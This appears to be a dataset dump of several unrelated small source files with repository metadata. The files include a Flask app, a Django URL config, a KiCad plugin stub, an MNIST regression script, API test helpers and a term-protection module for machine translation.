    return '+"&"+'.join('"' + x + '="+obj.' + x for x in varList)
def objFormation(varList):
    """Render a JS object-literal body: ["a"] -> "a:" + SCOPE("a").

    BUG FIX: the parameter was spelled `varlist` while the body iterated
    `varList`, raising NameError on every call (unless a same-named global
    happened to exist). The parameter is now the name the body uses; the
    argument is positional-only in practice, so callers are unaffected.
    """
    return ','.join(x + ':' + SCOPE(x) for x in varList)
def varsToAliasArr(varList):
    """Re-key a mapping of variables by each variable's `alias` attribute.

    Later entries with a duplicate alias overwrite earlier ones, matching
    the original loop's behavior.
    """
    return {v.alias: v for v in varList.values()}
def createObjFromScope(varList):
    # Render a JS object literal whose values are parsed scope lookups:
    # "{alias: PARSER(type, SCOPE(alias)), ...}".
    return '{'+(','.join(v.alias+":"+PARSER(v.validType,SCOPE(v.alias)) for v in varList.values()))+'}'
def responseToScope(varList):
    # Render JS statements copying response.data.data.<alias> into scope vars.
    return ''.join(SCOPE(v.alias)+"=response.data.data."+v.alias+";" for v in varList.values())
def argsToScope(varList):
    # Render JS statements copying same-named function arguments into scope vars.
    return ''.join(SCOPE(v.alias)+"="+v.alias+";" for v in varList.values())
|
[
"abhay199658@gmail.com"
] |
abhay199658@gmail.com
|
a564fadbeb8da66f7e99e8a1c5af6eec0923b3f2
|
5160cd2cf1ff8aa1d48935a783ba39e59f8d9ca7
|
/src/py.py
|
bbfff52bf7a351f5fc2d85e6364080af152fd517
|
[] |
no_license
|
harry-uglow/BananaBeats
|
eb9df6f9458e1d12a406f0d96dbe9980f278af6e
|
2e0eb211f5646be5675237c5c1c70d2feed8c57f
|
refs/heads/master
| 2021-01-19T12:47:57.520881
| 2017-08-29T20:36:19
| 2017-08-29T20:36:19
| 100,810,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
import subprocess
import threading
import sys
import time
import pygame
import os
import signal
import python.adafruit_libraries.Adafruit_MPR121.MPR121 as MPR121


def monitorInputs():
    """Poll the MPR121 touch sensor and forward touch/release events.

    Writes 't<pin>' / 'r<pin>' lines to the child process's stdin for every
    pin transition, polling all 12 pins at roughly 10 Hz. Never returns.
    """
    # Create MPR121 instance
    device = MPR121.MPR121()
    if not device.begin():
        sys.exit(1)
    pygame.mixer.pre_init(44100, -16, 12, 2048)
    pygame.init()
    # Main loop to play the correct sound every time a pin is touched
    last_touched = device.touched()
    while True:
        current_touched = device.touched()
        for i in range(12):
            pin_bit = 1 << i
            # Rising edge: pin newly touched.
            if current_touched & pin_bit and not last_touched & pin_bit:
                # BUG FIX: 't' + i concatenated str with int (TypeError);
                # convert the pin index explicitly.
                p.stdin.write('t' + str(i) + '\n')
                print('t' + str(i))
                p.stdin.flush()
                print('Pin ', i, ' touched')
            # Falling edge: pin released.
            if not current_touched & pin_bit and last_touched & pin_bit:
                p.stdin.write('r' + str(i) + '\n')
                p.stdin.flush()
                print('Pin ', i, ' released')
        last_touched = current_touched
        time.sleep(0.1)


print('strt')
# NOTE(review): shell=True with a list passes only the first element to the
# shell; './main' is the sole element here, so behavior is preserved.
p = subprocess.Popen(['./main'], stdin=subprocess.PIPE, close_fds=True, shell=True)
print('mon')
# BUG FIX: monitorInputs() was invoked before its def statement executed,
# raising NameError at startup; the call now follows the definition.
monitorInputs()
|
[
"mauriceyap@hotmail.co.uk"
] |
mauriceyap@hotmail.co.uk
|
420fab0c05381289bc6cac20833db699a61ff63b
|
b883802b374515f7bb453f9631a65bb63b5cd8cc
|
/filter.py
|
6e03457e43b34ee541ab28f736a0550bd1d99d3e
|
[] |
no_license
|
Harry-Yao/learn-about-python
|
6898cae04f665400ab255989b9d8c1388cb94362
|
558085e0fdd7a4488303c91206b44b353e4b58e7
|
refs/heads/master
| 2021-01-10T17:44:29.301594
| 2016-03-10T16:09:50
| 2016-03-10T16:09:50
| 52,965,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
# -*- coding: utf-8 -*-
def is_palindrome(n):
    """Return True if the decimal representation of `n` is a palindrome.

    BUG FIX (consistency): the original returned str(n) on success and an
    implicit None otherwise; a boolean is the honest filter predicate.
    str(n) is never empty, so truthiness under filter() is unchanged.
    """
    s = str(n)
    return s == s[::-1]


# Test:
output = filter(is_palindrome, range(1, 1000))
print(list(output))
|
[
"673441990@qq.com"
] |
673441990@qq.com
|
60c083d45755c5c8515e991f42f96dd819d6e4d5
|
fbbbcfa050612a6242c095060bad774b60fc914d
|
/archive_project/old_version.py
|
184a635253393fb5e1f993b883ce043eb4385aee
|
[] |
no_license
|
MitjaNemec/Kicad_action_plugins
|
79b4fa0fb8fdcb0aba3770f871f0c25bd982bea6
|
f7f2eaa567a7354459e17f108427584fa6a6a8a4
|
refs/heads/master
| 2023-08-29T12:09:48.978854
| 2023-06-15T18:41:08
| 2023-06-15T18:41:08
| 110,839,994
| 406
| 79
| null | 2022-03-31T06:31:07
| 2017-11-15T13:55:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,473
|
py
|
# -*- coding: utf-8 -*-
# action_replicate_layout.py
#
# Copyright (C) 2018 Mitja Nemec
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import pcbnew
import wx
class OldVersion(pcbnew.ActionPlugin):
    """Fallback plugin that tells the user their KiCad version is too old."""

    def defaults(self):
        # Registration metadata shown in the pcbnew plugin menu.
        self.name = "Archive project"
        self.category = "Archive project"
        self.description = "Archive schematics symbols and 3D models"

    def Run(self):
        # Find the pcbnew top-level window so the dialog is parented on it.
        frames = [w for w in wx.GetTopLevelWindows()
                  if w.GetTitle().lower().startswith('pcbnew')]
        _pcbnew_frame = frames[0]
        dlg = wx.MessageDialog(
            _pcbnew_frame,
            "This plugin works with KiCad 5.1 and higher",
            'Archive project',
            wx.OK | wx.ICON_INFORMATION,
        )
        dlg.ShowModal()
        dlg.Destroy()
|
[
"mitja.nemec@fe.uni-lj.si"
] |
mitja.nemec@fe.uni-lj.si
|
a1e59a682c3d21feebcf29921ab2ec3829992fd1
|
de3a062138d3fbdfcf76e09915be553aea450e61
|
/Tests.py
|
2b1454136905d54427a60069f63bcf68cbcf68c4
|
[] |
no_license
|
AlyonaMon/autotests
|
be9d0793ad36f917d7315325c3071042b592207f
|
4457f7f3f5ef65b1b67b08221e43693bf7c742f3
|
refs/heads/master
| 2021-01-11T18:54:34.717373
| 2016-11-14T21:35:02
| 2016-11-14T21:35:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,032
|
py
|
# coding=utf-8
import json
import logging

# Module-level logger writing to msg.log (truncated on every run via filemode='w').
logger = logging.getLogger(__name__)
logging.basicConfig(datefmt='%m/%d/%Y %I:%M:%S %p', filename="msg.log",
                    format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s', filemode='w')
from xml.etree import ElementTree
import xml.etree.ElementTree as etree
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import csv

# NOTE(review): this `global` statement at module scope is a no-op and the
# names are never assigned here -- presumably set elsewhere; confirm.
global response, test_dic_for_case, name_testsuite, name_testcase
def prettify(elem):
    """Return a pretty-printed XML string for an ElementTree element."""
    raw = ElementTree.tostring(elem, 'utf-8')
    return minidom.parseString(raw).toprettyxml(indent=" ")
# def XML_FILE(name_testsuite, name_testcase, m):
# # print name_testcase, name_testsuite
# top = Element('testsuites', name=str(name_testsuite))
# parent = SubElement(top, 'testsuite', name=str(name_testcase))
# # children = [Element('testsuite', name=str(Tests(response)))]
#
# top.extend(parent)
# return prettify(top)
def STATUS_CODE(response):
    """Check that the HTTP status code is 200 or 201; return a report line."""
    ok = response.status_code in (200, 201)
    if ok:
        text = "Response code is 200 or 201"
    else:
        text = "Response code is " + str(response.status_code)
    return text + ": " + str(ok)
def STATUS_CODE_NAME(response):
    """Check that the HTTP reason phrase is 'OK'; return a report line."""
    reason = response.reason
    if reason == 'OK':
        text = "Status code name has string '" + str(reason) + "'"
        outcome = True
    else:
        text = "Status code name '" + str(reason) + "'"
        outcome = False
    return text + ": " + str(outcome)
def RESPONSE_TIME(response):
    """Check that the response took under 0.5 seconds; return a report line.

    NOTE(review): the message says "ms" but total_seconds() yields seconds;
    the unit label looks wrong -- confirm before changing the report text.
    """
    elapsed = response.elapsed.total_seconds()
    if elapsed < 0.5:
        text = "Response time is less than 0.5ms"
        outcome = elapsed
    else:
        text = "Response time is more than 0.5ms"
        outcome = "False, time is " + str(elapsed)
    return text + ": " + str(outcome) + "ms"
def CONTENT_TYPE_IS_PRESENT(response):
    """Check that the response body is non-empty; return a report line."""
    present = response.content != ""
    if present:
        text = "Content type is present"
    else:
        text = "Content type is not present"
    return text + ": " + str(present)
def RESPONSE_HAS_ACCKEY(r):
    """Check that the parsed response dict `r` carries an 'access_key'.

    Logs the outcome via the module logger and returns a report line.
    NOTE(review): the failure branches call logger.setLevel(logging.ERROR),
    permanently raising the module logger's level as a side effect -- this
    silences later info() calls; confirm that is intended.
    """
    text = "Access Key present in response "
    if "access_key" in r:
        result = r["access_key"]
        logger.info('Authentication is successful')
        logger.info('Access Key present in response: %s', str(result))
        text = text + ": " + str(True)
    elif "Message" in r:
        # Server returned an error payload instead of credentials.
        logger.setLevel(logging.ERROR)
        logger.error('Access Key absent in response: %s', str(r))
        text = text + ": " + str(False)
    else:
        # Neither a key nor an error message: unexpected shape.
        logger.setLevel(logging.ERROR)
        logger.error('Fails for an paar App key - Access Key')
        text = text + ": " + str(False)
    return text
#
# def _is_empty(text):
# return not text or text.isspace()
"""def indent(elem, level=0, tab=' '):
i = '\n' + level * tab
j = i + tab # j = i_n+1
indent_parent = False
if len(elem):
if _is_empty(elem.text):
# Indent before element.
elem.text = j
if _is_empty(elem.tail):
# Indent after element.
elem.tail = i
prev = None
for child in elem:
indent_block = indent(child, level + 1, tab)
if indent_block or len(child) > 1:
# This child or some lower child block should be super-indented.
if len(elem) == 1:
# Pass indentation up because this level only has one child.
indent_parent = True
else:
# Surround this block with newlines for emphasis.
if prev is not None and _is_empty(prev.tail):
prev.tail = '\n' + j
if _is_empty(child.tail):
child.tail = '\n' + j
prev = child
if _is_empty(child.tail):
# Last child element determines closing tag tab level.
child.tail = i
else:
if level and _is_empty(elem.tail):
elem.tail = i
return indent_parent"""
def Tests(response, test_dic_for_case, name_testcase, top):
    """Append a <testsuite> for `name_testcase` under `top`, with one
    <testcase> per check named in `test_dic_for_case`.

    Each check renders its outcome into the testcase's name attribute;
    names containing "False" additionally receive a nested <failure>
    element in JUnit style.

    NOTE(review): SubElement already attaches each new node to its parent,
    so the extend() calls look redundant; Element.extend() iterates its
    argument and appends that element's *children*, which is a no-op for
    these leaf nodes -- confirm before removing them.
    """
    parent = SubElement(top, 'testsuite', name=str(name_testcase))
    if "STATUS_CODE" in test_dic_for_case:
        m = STATUS_CODE(response)
        children = SubElement(parent, 'testcase', name=str(m))
        if "False" in m:
            children_1 = SubElement(children, 'failure', type="AssertionFailure")
            children_2 = SubElement(children_1, 'failed')
            children_2.text = "![CDATA[Failed]]"
            children_1.extend(children_2)
        else:
            parent.extend(children)
    if "STATUS_CODE_NAME" in test_dic_for_case:
        m = STATUS_CODE_NAME(response)
        children = SubElement(parent, 'testcase', name=str(m))
        if "False" in m:
            children_1 = SubElement(children, 'failure', type="AssertionFailure")
            children_2 = SubElement(children_1, 'failed')
            children_2.text = "![CDATA[Failed]]"
            children_1.extend(children_2)
        else:
            parent.extend(children)
    if "RESPONSE_TIME" in test_dic_for_case:
        m = RESPONSE_TIME(response)
        children = SubElement(parent, 'testcase', name=str(m))
        if 'False' in m:
            children_1 = SubElement(children, 'failure', type="AssertionFailure")
            children_2 = SubElement(children_1, 'failed')
            children_2.text = "![CDATA[Failed]]"
            children_1.extend(children_2)
        else:
            parent.extend(children)
    if "CONTENT_TYPE_IS_PRESENT" in test_dic_for_case:
        m = CONTENT_TYPE_IS_PRESENT(response)
        children = SubElement(parent, 'testcase', name=str(m))
        if 'False' in m:
            children_1 = SubElement(children, 'failure', type="AssertionFailure")
            children_2 = SubElement(children_1, 'failed')
            children_2.text = "![CDATA[Failed]]"
            children_1.extend(children_2)
        else:
            parent.extend(children)
    if "RESPONSE_HAS_ACCKEY" in test_dic_for_case:
        # The raw body is parsed from the response object's private
        # _content attribute rather than response.json().
        dict_response = response.__dict__["_content"]
        r = json.loads(dict_response)
        m = RESPONSE_HAS_ACCKEY(r)
        children = SubElement(parent, 'testcase', name=str(m))
        if 'False' in m:
            children_1 = SubElement(children, 'failure', type="AssertionFailure")
            children_2 = SubElement(children_1, 'failed')
            children_2.text = "![CDATA[Failed]]"
            children_1.extend(children_2)
        else:
            parent.extend(children)
|
[
"evmon@ex.ua"
] |
evmon@ex.ua
|
f06e6cd20ffd0594a254af576292149542c248bf
|
7d57247e1cefc7dfdd4c12a745366fae5e413a11
|
/tests/conftest.py
|
9731d89f424cc00aa2b48745e73b0a2e2a1149b7
|
[
"BSD-2-Clause"
] |
permissive
|
chintal/sphinxcontrib-collations
|
6920314dddba4eea7b059028a9cb2c7dba9e3121
|
dd2b7f449bf025695fb25a4c685fd3ab9b1c6c53
|
refs/heads/master
| 2020-06-21T09:12:09.492796
| 2019-07-17T13:14:03
| 2019-07-17T14:22:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
py
|
"""
pytest config for sphinxcontrib/collations/tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by Chintalagiri Shashank <shashank.chintalagiri@gmail.com>
:license: BSD, see LICENSE for details.
"""
pytest_plugins = 'sphinx.testing.fixtures'
|
[
"shashank.chintalagiri@gmail.com"
] |
shashank.chintalagiri@gmail.com
|
550abb7570d8b8943d140a815dfcc92c727bbc0b
|
fbb1494be3ff7b6a5dfa3b9204cc927af4103b59
|
/api/urls.py
|
242b792a393d67ac9d39ff798fc079072c76b9ff
|
[] |
no_license
|
james-work-account/raml_loader_api
|
a3380faf6f07ae82b1b113e7019fbb5f6840df31
|
4483b13de5d74c20f7c3696ba6180332b36fdc2b
|
refs/heads/master
| 2021-07-24T07:32:28.507993
| 2020-10-06T08:38:23
| 2020-10-06T08:38:23
| 222,752,033
| 0
| 0
| null | 2020-10-06T08:25:55
| 2019-11-19T17:29:11
|
Python
|
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
    path('raml/', include('raml_parser.urls')),  # delegate /raml/* to the raml_parser app
    path('admin/', admin.site.urls),  # Django admin site
]
|
[
"31282758+james-work-account@users.noreply.github.com"
] |
31282758+james-work-account@users.noreply.github.com
|
db5c965f2a0a9a8eca0e23b6beaa853f2fa82cff
|
14d7dbf445a5fde2a6611c41cd55bc17978afec4
|
/flask_app/application.py
|
bfdd92df2989f1ed4b3c63654868c835612a6b6b
|
[] |
no_license
|
Happollyon/Class2
|
a7ef72caefebf5e23209b06ecf84560d3b73394f
|
8136fd0c70cf1cc4e82361d5a2ca54c282e5066c
|
refs/heads/master
| 2022-09-17T07:14:09.356631
| 2020-05-28T14:23:37
| 2020-05-28T14:23:37
| 257,603,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from flask import Flask, render_template,request, session
#from flask_session import Session
app=Flask(__name__)
@app.route('/')
def index():
    """Root route: fixed greeting."""
    return "Hello world"
@app.route('/fagner')
def fagner():
    """Static route with a fixed greeting."""
    return"hello fagner"
@app.route("/<string:name>") # dynamic route: <name> is captured from the URL path
def hello(name):
    """Greet whatever name appears in the URL segment."""
    return f"hello, {name}"
# NOTE(review): Jinja templates and template inheritance were apparently planned
# (render_template is imported) but are not used in this file.
|
[
"36013973+Happollyon@users.noreply.github.com"
] |
36013973+Happollyon@users.noreply.github.com
|
0da9380cc1898690b9c39d5b4b7ff4392ed376b1
|
753a03d58940847b76203e39b8cb60d775bc8370
|
/test/test_systems_generators_dockerignore.py
|
d95c632c27a1cd1a45a647dd3008e979abe95f4c
|
[
"MIT"
] |
permissive
|
SanthoshBala18/skelebot
|
912d84abef113f86eeb6b05f50ae9c2bd6115d45
|
13055dba1399b56a76a392699aa0aa259ca916a9
|
refs/heads/master
| 2020-08-03T15:24:11.105137
| 2019-09-27T15:12:25
| 2019-09-27T15:12:25
| 211,799,653
| 0
| 0
|
MIT
| 2019-09-30T07:19:27
| 2019-09-30T07:19:27
| null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
from unittest import TestCase
from unittest import mock
import skelebot as sb
import os
class TestDockerignore(TestCase):
    """Verify that skelebot's dockerignore generator writes the expected file."""
    path = ""      # real working directory captured in setUp (before os.getcwd is mocked)
    config = None  # skelebot config loaded inside the test
    # Get the path to the current working directory before we mock the function to do so
    def setUp(self):
        self.path = os.getcwd()
    @mock.patch('os.path.expanduser')
    @mock.patch('os.getcwd')
    def test_buildDockerignore(self, mock_getcwd, mock_expanduser):
        # Point cwd/home at the test fixture folders so the generator writes there.
        folderPath = "{path}/test/files".format(path=self.path)
        filePath = "{folder}/.dockerignore".format(folder=folderPath)
        mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
        mock_getcwd.return_value = folderPath
        self.config = sb.systems.generators.yaml.loadConfig()
        expected= """
# This dockerignore was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
**/*.zip
**/*.RData
**/*.pkl
**/*.csv
**/*.model
**/*.pyc
"""
        sb.systems.generators.dockerignore.buildDockerignore(self.config)
        data = None
        with open(filePath, "r") as file:
            data = file.read()
        # The generated file must exist and match the template exactly.
        self.assertTrue(data is not None)
        self.assertEqual(data, expected)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
7ca71e74e605112ef507f107584f872545a68564
|
499efac953f9f0ed3ef1876b3a470250c75f7ac1
|
/mnist_sklearn.py
|
7f778519c5dc8279f17a25ce634530272f3881e0
|
[] |
no_license
|
ravi911sharma44/MNIST-
|
b7ffe5c2b9492e7997590a618c8a483f72709e95
|
15fb747ce7e928f963d4bd61d28a5411e98878c8
|
refs/heads/main
| 2023-07-17T03:04:02.138426
| 2021-08-14T15:31:24
| 2021-08-14T15:31:24
| 396,047,993
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
import pandas as pd
# NOTE(review): absolute Windows path — this script only runs as-is on the
# author's machine; consider a CLI argument or relative path.
df = pd.read_csv (r'E:\chat bot intern\week 3\mnist_train.csv\mnist_train.csv')
df = pd.DataFrame(df)
from sklearn.model_selection import train_test_split
# Features are the pixel columns; target is the 'label' column.
X = df.drop('label', axis = 1)
Y = df.label
# 80/20 train/test split.
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2)
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
# NOTE(review): LinearRegression treats the 0-9 digit labels as a continuous
# target; a classifier (e.g. LogisticRegression) is presumably intended — confirm.
model = LinearRegression()
model.fit(x_train, y_train)
pred = model.predict(x_test)
print(mean_squared_error(y_test, pred))
|
[
"noreply@github.com"
] |
noreply@github.com
|
d7d2b1821665e6ce2fba837251c3f8cc1a3c770e
|
fff4663f296e081d4aa3ca4b36c301afb95aee88
|
/lib_translate/term_protection.py
|
b5dab0be375d36ef3d46bc9c0450aa52067b961f
|
[] |
no_license
|
sammichenVV/translateserver-py
|
84d7787c0b4e42542be433b909ed243f65e4ed38
|
b4c6900281b2219097d6f1f86a71311180a60c1e
|
refs/heads/main
| 2023-03-19T14:20:00.579830
| 2021-03-17T06:54:01
| 2021-03-17T06:54:01
| 348,186,221
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,773
|
py
|
"""
对输入文本的专业术语进行保护,目前仅支持一句话中对一个术语进行保护
>>> src_word, tgt_word = "Hello world", "你好世界"
>>> add_words([[src_word, tgt_word]])
>>> src_word.lower() in show_words(return_dict=True)
True
>>> add_words([["I'm", "我是"]])
>>> sent, term = mask_term("hello world! I'm.")
>>> de_mask_term(sent, term)
'你好世界! 我是.'
>>> delete_words(["I'm", "hello world"])
>>> src_word.lower() not in show_words(return_dict=True)
True
>>> mask_term("hello world! I'm.")
("hello world! I'm.", [])
"""
import re
import warnings
import pandas
from sqlalchemy import Column, String, create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from config import global_config
PROTECTION_SYMBOL = global_config["term_mask_symbol"]
DICT_FILE = global_config.get("term_protection_dict", None)
SRC_LANG = global_config["translate_src_lang"]
TGT_LANG = global_config["translate_tgt_lang"]
TERM_PROTECTION_DB = global_config["term_protection_db"]
__all__ = ["mask_term", "de_mask_term",
"add_words", "delete_words", "show_words"]
def _transform_word(word):
"""
对加入词表的词进行预处理
"""
return word.strip().lower()
class DFAFilter():
    """
    Term filter built on a DFA (character trie with end-of-word markers).

    >>> keywords = ["hello world", "I'm", "hello"]
    >>> dfa_filter = DFAFilter(keywords)
    >>> terms, indexes = dfa_filter.filter("Hello world. I'm fine thank you.")
    >>> terms
    ['Hello world', "I'm"]
    >>> indexes
    [(0, 11), (13, 16)]
    """
    def __init__(self, keywords):
        # Nested dicts form the trie; the special key `delimit` marks that a
        # keyword ends at that node.
        self.keyword_chains = {}
        self.delimit = '\x00'
        self.keywords = keywords
        for word in keywords:
            if isinstance(word, str):
                self.add(word.strip())
    def remove(self, keyword):
        """
        Remove a keyword from the filter.
        """
        if not keyword:
            return
        chars = _transform_word(keyword)
        level = self.keyword_chains
        # Track the last node where another (shorter) keyword ends, so a
        # dangling chain can be unlinked from there.
        prev_level = None
        prev_key = None
        for char in chars:
            if char not in level:
                return
            if self.delimit in level:
                prev_level = level
                prev_key = char
            level = level[char]
        if len(level) > 1:
            # Keyword is a prefix of longer keywords: just unmark its end.
            level.pop(self.delimit)
        else:
            # NOTE(review): if no shorter keyword shares the chain, prev_level
            # stays None and this raises AttributeError — confirm callers only
            # remove words that were actually added alongside others.
            prev_level.pop(prev_key)
    def add(self, keyword):
        """
        Add a keyword to the filter's trie.
        """
        chars = _transform_word(keyword)
        if not chars:
            return
        level = self.keyword_chains
        for i in range(0, len(chars)):
            if chars[i] in level:
                # Shared prefix already present; descend.
                level = level[chars[i]]
            else:
                # Build the remainder of the chain and mark its end.
                for j in range(i, len(chars)):
                    level[chars[j]] = {}
                    last_level, last_char = level, chars[j]
                    level = level[chars[j]]
                last_level[last_char] = {self.delimit: 0}
                break
            if i == len(chars) - 1:
                level[self.delimit] = 0
    def filter(self, message):
        """
        Find all keyword occurrences in *message*.

        Returns (matched_substrings_from_original_text, [(start, end), ...]).
        Matching is done on the normalized text; the longest match at each
        start position wins.
        """
        origin_message = message
        message = _transform_word(message)
        sensitive_words = []
        indexes = []
        start = 0
        while start < len(message):
            level = self.keyword_chains
            step_ins = 0
            word_start, word_end = -1, -1
            for char in message[start:]:
                if char in level:
                    step_ins += 1
                    if self.delimit in level[char]:
                        # A keyword ends here; remember the longest so far.
                        word_start, word_end = start, start + step_ins
                    level = level[char]
                else:
                    break
            if word_end >= 0:
                sensitive_words.append(origin_message[word_start: word_end])
                indexes.append((word_start, word_end))
                # Resume scanning just after the match (the +1 below re-centers).
                start = word_end - 1
            start += 1
        return sensitive_words, indexes
Base = declarative_base()
class Vocab(Base):
    """One protected term pair per row; table is named after the language pair."""
    __tablename__ = "{}-{}".format(SRC_LANG, TGT_LANG)
    src_word = Column(String(64), primary_key=True)  # source-language term (unique key)
    tgt_word = Column(String(64))  # protected target-language translation
# Module-level sqlite engine/session shared by all dictionary operations;
# the table is created on import if it does not exist yet.
ENGIN = create_engine("sqlite:///{}".format(TERM_PROTECTION_DB))
SESSION = sessionmaker(bind=ENGIN)()
Base.metadata.create_all(ENGIN)
def read_dict_sqlite():
    """Load the protected-term dictionary from the sqlite database.

    Returns a dict mapping each normalized source term to its
    target-language translation.
    """
    return {
        _transform_word(row.src_word): row.tgt_word
        for row in SESSION.query(Vocab)
    }
def read_dict_excel(term_file):
    """Load the protected-term dictionary from an Excel file.

    Expected format: the header row holds the two language codes
    (e.g. zh / en); each following row is one protected term pair.

    Returns the mapping for the configured SRC_LANG->TGT_LANG direction.
    BUG FIX: previously this returned ``vocab.get(...)`` with no default, so a
    mismatched language pair yielded None and the module-level
    ``MAPPING.update(read_dict_sqlite())`` crashed with AttributeError;
    an empty dict is now returned instead.
    """
    dataframe = pandas.read_excel(term_file)
    langs = dataframe.columns.tolist()
    mapping = {}
    reverse_mapping = {}
    for _, (src, tgt) in dataframe.iterrows():
        # Skip rows where either cell is missing (NaN) or non-text.
        if isinstance(src, str) and isinstance(tgt, str):
            mapping[_transform_word(src)] = tgt
            reverse_mapping[_transform_word(tgt)] = src
    # Both directions are built so the file works regardless of column order.
    vocab = {
        "{}-{}".format(*langs): mapping,
        "{}-{}".format(*reversed(langs)): reverse_mapping
    }
    return vocab.get("{}-{}".format(SRC_LANG, TGT_LANG), {})
# Build the in-memory protection dictionary at import time:
# Excel file first (when configured), then merge in the sqlite entries.
if DICT_FILE:
    try:
        MAPPING = read_dict_excel(DICT_FILE)
    except FileNotFoundError:
        MAPPING = {}
else:
    MAPPING = {}
if not MAPPING:
    warnings.warn(
        "Can't find mapping {}-{} from dict file for term protecting.".format(SRC_LANG, TGT_LANG))
# NOTE(review): read_dict_excel returns vocab.get(...) with no default, which
# can be None when the file's language pair doesn't match SRC_LANG-TGT_LANG;
# .update() would then raise AttributeError — confirm and guard.
MAPPING.update(read_dict_sqlite())
TERM_FILTER = DFAFilter(list(MAPPING.keys()))
def mask_term(sent):
    """Replace protected terms in *sent* with numbered placeholder symbols.

    Returns ``(masked_sentence, terms)`` where ``terms[i]`` is the original
    text that placeholder ``PROTECTION_SYMBOL + str(i)`` replaced.

    If the sentence already contains the protection symbol it is returned
    untouched with an empty term list. BUG FIX: this path previously returned
    ``""`` (a string) instead of a list, inconsistent with the normal return
    type; it also ran the filter before the check, wasting a full scan.
    """
    # Early out: never double-mask a sentence that already carries the symbol.
    if PROTECTION_SYMBOL in sent:
        return sent, []
    terms, indexes = TERM_FILTER.filter(sent)
    string_builder = ""
    prev = 0  # end offset of the previously replaced term
    for i, (start, end) in enumerate(indexes):
        string_builder += sent[prev:start]
        string_builder += PROTECTION_SYMBOL + str(i)
        prev = end
    string_builder += sent[prev:]
    return string_builder, terms
# Matches a placeholder: a run of protection-symbol characters (spaces allowed,
# in case the translator inserted them) followed by the placeholder index.
RE_DEMULTY = re.compile(
    "([{} ]+)([0-9]+)".format("".join(set(PROTECTION_SYMBOL))))
def de_mask_term(sent, terms):
    """
    Replace the numbered placeholders in *sent* with the protected
    translations of the corresponding entries of *terms*.
    """
    string_builder = ""
    prev = 0  # end offset of the previous placeholder match
    for obj in RE_DEMULTY.finditer(sent):
        start, end = obj.span()
        string_builder += sent[prev:start]
        prev = end
        prefix, num = obj.groups()
        if not prefix.replace(" ", ""):
            # Prefix is spaces only: not a real placeholder, skip it.
            # NOTE(review): prev was already advanced, so the matched digits
            # are dropped from the output — confirm this is intended.
            continue
        num = int(num)
        if num >= len(terms):
            # Index with no matching term (e.g. model hallucinated a number).
            continue
        term = terms[num]
        # Substitute the protected translation for the original source term.
        string_builder += MAPPING[_transform_word(term)]
    string_builder += sent[prev:]
    return string_builder
def add_words(words):
    """Add (source, target) term pairs to the protection dictionary.

    Each pair is upserted into the sqlite table and mirrored into the
    in-memory mapping and the DFA filter; the transaction is committed
    once after all pairs are processed.
    """
    for source, target in words:
        SESSION.merge(Vocab(src_word=source, tgt_word=target))
        MAPPING[_transform_word(source)] = target
        TERM_FILTER.add(source)
    SESSION.commit()
def delete_words(words):
    """Remove terms from the protection dictionary.

    Each word is deleted from the sqlite table, the DFA filter and the
    in-memory mapping; one commit covers the whole batch.
    """
    for term in words:
        SESSION.query(Vocab).filter(Vocab.src_word == term).delete()
        TERM_FILTER.remove(term)
        MAPPING.pop(_transform_word(term), None)
    SESSION.commit()
def show_words(return_dict=False):
    """Return every entry currently in the protection dictionary.

    With ``return_dict=True`` the internal mapping object itself is returned;
    otherwise a list of ``[source, target]`` pairs is produced.
    """
    if return_dict:
        return MAPPING
    return [list(pair) for pair in MAPPING.items()]
|
[
"00025@yu.lan-bridge.com"
] |
00025@yu.lan-bridge.com
|
392d504d2b4be2f95ee073ec8a8beccce1d6bd49
|
d1a111119ec7aed797d1487b9a5740217d43effc
|
/students/templatetags/tags.py
|
28e1e2ea85fd52a4ce90660cb5ee127a9c1a29cf
|
[] |
no_license
|
shurique/student_task
|
3f693f20691971f9e7fee03e8cc4cffd130aa53b
|
2cf873adbc8657ac31e6efc4c12805c0387a67d7
|
refs/heads/master
| 2021-01-10T22:20:51.941404
| 2012-02-03T08:31:30
| 2012-02-03T08:31:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
